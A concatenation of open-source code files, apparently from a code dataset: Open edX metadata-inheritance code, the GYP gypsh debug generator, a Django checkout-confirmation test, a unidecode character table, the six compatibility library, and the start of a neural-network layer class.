"""Given a descriptor, traverse all of its descendants and do metadata
inheritance. Should be called on a CourseDescriptor after importing a
course.
NOTE: This means that there is no such thing as lazy loading at the
moment--this accesses all the children."""
if descriptor.has_children:
parent_metadata = descriptor.xblock_kvs.inherited_settings.copy()
# add any of descriptor's explicitly set fields to the inheriting list
for field in InheritanceMixin.fields.values():
if field.is_set_on(descriptor):
# inherited_settings values are json repr
parent_metadata[field.name] = field.read_json(descriptor)
for child in descriptor.get_children():
inherit_metadata(child, parent_metadata)
compute_inherited_metadata(child)
def inherit_metadata(descriptor, inherited_data):
"""
Updates this module with metadata inherited from a containing module.
Only metadata specified in self.inheritable_metadata will
be inherited
`inherited_data`: A dictionary mapping field names to the values that
they should inherit
"""
try:
descriptor.xblock_kvs.inherited_settings = inherited_data
except AttributeError: # the kvs doesn't have inherited_settings probably b/c it's an error module
pass
def own_metadata(module):
"""
Return a JSON-friendly dictionary that contains only non-inherited field
keys, mapped to their serialized values
"""
return module.get_explicitly_set_fields_by_scope(Scope.settings)
class InheritingFieldData(KvsFieldData):
"""A `FieldData` implementation that can inherit value from parents to children."""
def __init__(self, inheritable_names, **kwargs):
"""
`inheritable_names` is a list of names that can be inherited from
parents.
"""
super(InheritingFieldData, self).__init__(**kwargs)
self.inheritable_names = set(inheritable_names)
def default(self, block, name):
"""
The default for an inheritable name is found on a parent.
"""
if name in self.inheritable_names:
# Walk up the content tree to find the first ancestor
# that this field is set on. Use the field from the current
# block so that if it has a different default than the root
# node of the tree, the block's default will be used.
field = block.fields[name]
ancestor = block.get_parent()
while ancestor is not None:
if field.is_set_on(ancestor):
return field.read_json(ancestor)
else:
ancestor = ancestor.get_parent()
return super(InheritingFieldData, self).default(block, name)
def inheriting_field_data(kvs):
"""Create an InheritanceFieldData that inherits the names in InheritanceMixin."""
return InheritingFieldData(
inheritable_names=InheritanceMixin.fields.keys(),
kvs=kvs,
)
class InheritanceKeyValueStore(KeyValueStore):
"""
Common superclass for kvs's which know about inheritance of settings. Offers simple
dict-based storage of fields and lookup of inherited values.
Note: inherited_settings is a dict of key to json values (internal xblock field repr)
"""
def __init__(self, initial_values=None, inherited_settings=None):
super(InheritanceKeyValueStore, self).__init__()
self.inherited_settings = inherited_settings or {}
self._fields = initial_values or {}
def get(self, key):
return self._fields[key.field_name]
def set(self, key, value):
# xml backed courses are read-only, but they do have some computed fields
self._fields[key.field_name] = value
def delete(self, key):
del self._fields[key.field_name]
def has(self, key):
return key.field_name in self._fields
def default(self, key):
"""
Check to see if the default should be from inheritance. If not
inheriting, this will raise KeyError which will cause the caller to use
the field's global default.
"""
return self.inherited_settings[key.field_name]
| agpl-3.0 |
boyers/hamlit | node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/generator/gypsh.py | 2779 | 1665 | # Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""gypsh output module
gypsh is a GYP shell. It's not really a generator per se. All it does is
fire up an interactive Python session with a few local variables set to the
variables passed to the generator. Like gypd, it's intended as a debugging
aid, to facilitate the exploration of .gyp structures after being processed
by the input module.
The expected usage is "gyp -f gypsh -D OS=desired_os".
"""
import code
import sys
# All of this stuff about generator variables was lovingly ripped from gypd.py.
# That module has a much better description of what's going on and why.
_generator_identity_variables = [
'EXECUTABLE_PREFIX',
'EXECUTABLE_SUFFIX',
'INTERMEDIATE_DIR',
'PRODUCT_DIR',
'RULE_INPUT_ROOT',
'RULE_INPUT_DIRNAME',
'RULE_INPUT_EXT',
'RULE_INPUT_NAME',
'RULE_INPUT_PATH',
'SHARED_INTERMEDIATE_DIR',
]
generator_default_variables = {
}
for v in _generator_identity_variables:
generator_default_variables[v] = '<(%s)' % v
def GenerateOutput(target_list, target_dicts, data, params):
locals = {
'target_list': target_list,
'target_dicts': target_dicts,
'data': data,
}
# Use a banner that looks like the stock Python one and like what
# code.interact uses by default, but tack on something to indicate what
# locals are available, and identify gypsh.
banner='Python %s on %s\nlocals.keys() = %s\ngypsh' % \
(sys.version, sys.platform, repr(sorted(locals.keys())))
code.interact(banner, local=locals)
| mit |
libretees/libreshop | libreshop/orders/tests/test_ConfirmationView.py | 1 | 2648 | from importlib import import_module
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.urlresolvers import reverse
from django.test import TestCase, RequestFactory
from orders.models import Order, Purchase, Transaction
from products.models import Product, Variant
from ..views import UUID
class ConfirmationViewTest(TestCase):
def setUp(self):
'''
Create common test assets prior to each individual unit test run.
'''
# Set up test data.
self.product = Product.objects.create(name='foo', sku='123')
self.variant = Variant.objects.create(
product=self.product, name='bar', sub_sku='456'
)
self.order = Order.objects.create()
self.purchase = Purchase.objects.create(
order=self.order, variant=self.variant
)
self.transaction = Transaction.objects.create(
order=self.order, transaction_id='foo'
)
# Put Order Token within session variable.
session = self.client.session
session.update({
UUID: {
'order_token': self.order.token
}
})
session.save()
self.view_url = reverse('checkout:confirmation')
def test_view_returns_200_status_if_no_order_token_is_in_session_variables(self):
'''
Test that the ConfirmationView returns a 200 OK status if there is no
Order Token within session variables.
'''
session = self.client.session
del session[UUID]['order_token']
session.save()
# Perform test.
response = self.client.get(self.view_url)
rendered_html = response.content.decode()
self.assertEqual(response.status_code, 200)
def test_view_returns_200_status_if_order_token_is_in_session_variables(self):
'''
Test that the ConfirmationView returns a 200 OK status if an Order Token
is present within session variables.
'''
# Perform test.
response = self.client.get(self.view_url)
self.assertEqual(response.status_code, 200)
def test_view_redirects_on_successful_post(self):
'''
Test that the ConfirmationView returns a 302 Found (Temporary Redirect)
status if valid Form data is POSTed to the View's OrderReceiptForm.
'''
# Set up HTTP POST request.
request_data = {'email_address': 'test@example.com'}
# Perform test.
response = self.client.post(self.view_url, data=request_data, follow=False)
self.assertRedirects(response, self.view_url)
| gpl-3.0 |
Hellowlol/plexpy | lib/unidecode/x073.py | 252 | 4646 | data = (
'Sha ', # 0x00
'Li ', # 0x01
'Han ', # 0x02
'Xian ', # 0x03
'Jing ', # 0x04
'Pai ', # 0x05
'Fei ', # 0x06
'Yao ', # 0x07
'Ba ', # 0x08
'Qi ', # 0x09
'Ni ', # 0x0a
'Biao ', # 0x0b
'Yin ', # 0x0c
'Lai ', # 0x0d
'Xi ', # 0x0e
'Jian ', # 0x0f
'Qiang ', # 0x10
'Kun ', # 0x11
'Yan ', # 0x12
'Guo ', # 0x13
'Zong ', # 0x14
'Mi ', # 0x15
'Chang ', # 0x16
'Yi ', # 0x17
'Zhi ', # 0x18
'Zheng ', # 0x19
'Ya ', # 0x1a
'Meng ', # 0x1b
'Cai ', # 0x1c
'Cu ', # 0x1d
'She ', # 0x1e
'Kari ', # 0x1f
'Cen ', # 0x20
'Luo ', # 0x21
'Hu ', # 0x22
'Zong ', # 0x23
'Ji ', # 0x24
'Wei ', # 0x25
'Feng ', # 0x26
'Wo ', # 0x27
'Yuan ', # 0x28
'Xing ', # 0x29
'Zhu ', # 0x2a
'Mao ', # 0x2b
'Wei ', # 0x2c
'Yuan ', # 0x2d
'Xian ', # 0x2e
'Tuan ', # 0x2f
'Ya ', # 0x30
'Nao ', # 0x31
'Xie ', # 0x32
'Jia ', # 0x33
'Hou ', # 0x34
'Bian ', # 0x35
'You ', # 0x36
'You ', # 0x37
'Mei ', # 0x38
'Zha ', # 0x39
'Yao ', # 0x3a
'Sun ', # 0x3b
'Bo ', # 0x3c
'Ming ', # 0x3d
'Hua ', # 0x3e
'Yuan ', # 0x3f
'Sou ', # 0x40
'Ma ', # 0x41
'Yuan ', # 0x42
'Dai ', # 0x43
'Yu ', # 0x44
'Shi ', # 0x45
'Hao ', # 0x46
'[?] ', # 0x47
'Yi ', # 0x48
'Zhen ', # 0x49
'Chuang ', # 0x4a
'Hao ', # 0x4b
'Man ', # 0x4c
'Jing ', # 0x4d
'Jiang ', # 0x4e
'Mu ', # 0x4f
'Zhang ', # 0x50
'Chan ', # 0x51
'Ao ', # 0x52
'Ao ', # 0x53
'Hao ', # 0x54
'Cui ', # 0x55
'Fen ', # 0x56
'Jue ', # 0x57
'Bi ', # 0x58
'Bi ', # 0x59
'Huang ', # 0x5a
'Pu ', # 0x5b
'Lin ', # 0x5c
'Yu ', # 0x5d
'Tong ', # 0x5e
'Yao ', # 0x5f
'Liao ', # 0x60
'Shuo ', # 0x61
'Xiao ', # 0x62
'Swu ', # 0x63
'Ton ', # 0x64
'Xi ', # 0x65
'Ge ', # 0x66
'Juan ', # 0x67
'Du ', # 0x68
'Hui ', # 0x69
'Kuai ', # 0x6a
'Xian ', # 0x6b
'Xie ', # 0x6c
'Ta ', # 0x6d
'Xian ', # 0x6e
'Xun ', # 0x6f
'Ning ', # 0x70
'Pin ', # 0x71
'Huo ', # 0x72
'Nou ', # 0x73
'Meng ', # 0x74
'Lie ', # 0x75
'Nao ', # 0x76
'Guang ', # 0x77
'Shou ', # 0x78
'Lu ', # 0x79
'Ta ', # 0x7a
'Xian ', # 0x7b
'Mi ', # 0x7c
'Rang ', # 0x7d
'Huan ', # 0x7e
'Nao ', # 0x7f
'Luo ', # 0x80
'Xian ', # 0x81
'Qi ', # 0x82
'Jue ', # 0x83
'Xuan ', # 0x84
'Miao ', # 0x85
'Zi ', # 0x86
'Lu ', # 0x87
'Lu ', # 0x88
'Yu ', # 0x89
'Su ', # 0x8a
'Wang ', # 0x8b
'Qiu ', # 0x8c
'Ga ', # 0x8d
'Ding ', # 0x8e
'Le ', # 0x8f
'Ba ', # 0x90
'Ji ', # 0x91
'Hong ', # 0x92
'Di ', # 0x93
'Quan ', # 0x94
'Gan ', # 0x95
'Jiu ', # 0x96
'Yu ', # 0x97
'Ji ', # 0x98
'Yu ', # 0x99
'Yang ', # 0x9a
'Ma ', # 0x9b
'Gong ', # 0x9c
'Wu ', # 0x9d
'Fu ', # 0x9e
'Wen ', # 0x9f
'Jie ', # 0xa0
'Ya ', # 0xa1
'Fen ', # 0xa2
'Bian ', # 0xa3
'Beng ', # 0xa4
'Yue ', # 0xa5
'Jue ', # 0xa6
'Yun ', # 0xa7
'Jue ', # 0xa8
'Wan ', # 0xa9
'Jian ', # 0xaa
'Mei ', # 0xab
'Dan ', # 0xac
'Pi ', # 0xad
'Wei ', # 0xae
'Huan ', # 0xaf
'Xian ', # 0xb0
'Qiang ', # 0xb1
'Ling ', # 0xb2
'Dai ', # 0xb3
'Yi ', # 0xb4
'An ', # 0xb5
'Ping ', # 0xb6
'Dian ', # 0xb7
'Fu ', # 0xb8
'Xuan ', # 0xb9
'Xi ', # 0xba
'Bo ', # 0xbb
'Ci ', # 0xbc
'Gou ', # 0xbd
'Jia ', # 0xbe
'Shao ', # 0xbf
'Po ', # 0xc0
'Ci ', # 0xc1
'Ke ', # 0xc2
'Ran ', # 0xc3
'Sheng ', # 0xc4
'Shen ', # 0xc5
'Yi ', # 0xc6
'Zu ', # 0xc7
'Jia ', # 0xc8
'Min ', # 0xc9
'Shan ', # 0xca
'Liu ', # 0xcb
'Bi ', # 0xcc
'Zhen ', # 0xcd
'Zhen ', # 0xce
'Jue ', # 0xcf
'Fa ', # 0xd0
'Long ', # 0xd1
'Jin ', # 0xd2
'Jiao ', # 0xd3
'Jian ', # 0xd4
'Li ', # 0xd5
'Guang ', # 0xd6
'Xian ', # 0xd7
'Zhou ', # 0xd8
'Gong ', # 0xd9
'Yan ', # 0xda
'Xiu ', # 0xdb
'Yang ', # 0xdc
'Xu ', # 0xdd
'Luo ', # 0xde
'Su ', # 0xdf
'Zhu ', # 0xe0
'Qin ', # 0xe1
'Ken ', # 0xe2
'Xun ', # 0xe3
'Bao ', # 0xe4
'Er ', # 0xe5
'Xiang ', # 0xe6
'Yao ', # 0xe7
'Xia ', # 0xe8
'Heng ', # 0xe9
'Gui ', # 0xea
'Chong ', # 0xeb
'Xu ', # 0xec
'Ban ', # 0xed
'Pei ', # 0xee
'[?] ', # 0xef
'Dang ', # 0xf0
'Ei ', # 0xf1
'Hun ', # 0xf2
'Wen ', # 0xf3
'E ', # 0xf4
'Cheng ', # 0xf5
'Ti ', # 0xf6
'Wu ', # 0xf7
'Wu ', # 0xf8
'Cheng ', # 0xf9
'Jun ', # 0xfa
'Mei ', # 0xfb
'Bei ', # 0xfc
'Ting ', # 0xfd
'Xian ', # 0xfe
'Chuo ', # 0xff
)
| gpl-3.0 |
pv/scikit-learn | sklearn/externals/six.py | 547 | 20588 | """Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2013 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.4.1"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result)
# This is a bit ugly, but it avoids running this again.
delattr(tp, self.name)
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
"""Lazy loading of moved objects"""
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("UserString", "UserString", "collections"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
del attr
moves = sys.modules[__name__ + ".moves"] = _MovedItems(__name__ + ".moves")
class Module_six_moves_urllib_parse(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_parse"""
_urllib_parse_moved_attributes = [
MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
MovedAttribute("urljoin", "urlparse", "urllib.parse"),
MovedAttribute("urlparse", "urlparse", "urllib.parse"),
MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
MovedAttribute("quote", "urllib", "urllib.parse"),
MovedAttribute("quote_plus", "urllib", "urllib.parse"),
MovedAttribute("unquote", "urllib", "urllib.parse"),
MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
MovedAttribute("urlencode", "urllib", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse")
sys.modules[__name__ + ".moves.urllib.parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib.parse")
class Module_six_moves_urllib_error(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_error"""
_urllib_error_moved_attributes = [
MovedAttribute("URLError", "urllib2", "urllib.error"),
MovedAttribute("HTTPError", "urllib2", "urllib.error"),
MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib_error")
sys.modules[__name__ + ".moves.urllib.error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib.error")
class Module_six_moves_urllib_request(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_request"""
_urllib_request_moved_attributes = [
MovedAttribute("urlopen", "urllib2", "urllib.request"),
MovedAttribute("install_opener", "urllib2", "urllib.request"),
MovedAttribute("build_opener", "urllib2", "urllib.request"),
MovedAttribute("pathname2url", "urllib", "urllib.request"),
MovedAttribute("url2pathname", "urllib", "urllib.request"),
MovedAttribute("getproxies", "urllib", "urllib.request"),
MovedAttribute("Request", "urllib2", "urllib.request"),
MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
MovedAttribute("FileHandler", "urllib2", "urllib.request"),
MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
MovedAttribute("urlretrieve", "urllib", "urllib.request"),
MovedAttribute("urlcleanup", "urllib", "urllib.request"),
MovedAttribute("URLopener", "urllib", "urllib.request"),
MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib_request")
sys.modules[__name__ + ".moves.urllib.request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib.request")
class Module_six_moves_urllib_response(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_response"""
_urllib_response_moved_attributes = [
MovedAttribute("addbase", "urllib", "urllib.response"),
MovedAttribute("addclosehook", "urllib", "urllib.response"),
MovedAttribute("addinfo", "urllib", "urllib.response"),
MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib_response")
sys.modules[__name__ + ".moves.urllib.response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib.response")
class Module_six_moves_urllib_robotparser(types.ModuleType):
"""Lazy loading of moved objects in six.moves.urllib_robotparser"""
_urllib_robotparser_moved_attributes = [
MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
sys.modules[__name__ + ".moves.urllib_robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib_robotparser")
sys.modules[__name__ + ".moves.urllib.robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
"""Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
parse = sys.modules[__name__ + ".moves.urllib_parse"]
error = sys.modules[__name__ + ".moves.urllib_error"]
request = sys.modules[__name__ + ".moves.urllib_request"]
response = sys.modules[__name__ + ".moves.urllib_response"]
robotparser = sys.modules[__name__ + ".moves.urllib_robotparser"]
sys.modules[__name__ + ".moves.urllib"] = Module_six_moves_urllib(__name__ + ".moves.urllib")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_closure = "__closure__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_func_globals = "__globals__"
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
_iterlists = "lists"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_closure = "func_closure"
_func_code = "func_code"
_func_defaults = "func_defaults"
_func_globals = "func_globals"
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
_iterlists = "iterlists"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
def get_unbound_function(unbound):
return unbound
create_bound_method = types.MethodType
Iterator = object
else:
def get_unbound_function(unbound):
return unbound.im_func
def create_bound_method(func, obj):
return types.MethodType(func, obj, obj.__class__)
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
def iterkeys(d, **kw):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)(**kw))
def itervalues(d, **kw):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)(**kw))
def iteritems(d, **kw):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)(**kw))
def iterlists(d, **kw):
"""Return an iterator over the (key, [values]) pairs of a dictionary."""
return iter(getattr(d, _iterlists)(**kw))
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
unichr = chr
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
byte2int = operator.itemgetter(0)
indexbytes = operator.getitem
iterbytes = iter
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s):
return s
def u(s):
return unicode(s, "unicode_escape")
unichr = unichr
int2byte = chr
def byte2int(bs):
return ord(bs[0])
def indexbytes(buf, i):
return ord(buf[i])
def iterbytes(buf):
return (ord(byte) for byte in buf)
import StringIO
StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
import builtins
exec_ = getattr(builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
print_ = getattr(builtins, "print")
del builtins
else:
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
def print_(*args, **kwargs):
"""The new-style print function."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, *bases):
"""Create a base class with a metaclass."""
return meta("NewBase", bases, {})
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
for slots_var in orig_vars.get('__slots__', ()):
orig_vars.pop(slots_var)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
| bsd-3-clause |
yzldw333/Neural-Network | NeuralNetwork/Layers/core.py | 1 | 18474 | import abc
import numpy as np
import random
CONV_TYPE = 0
FC_TYPE = 1
ACTIVATE_TYPE = 2
class BaseLayer(metaclass = abc.ABCMeta):
last_layer = None
next_layer = None
value = None #n*m array for forward computation
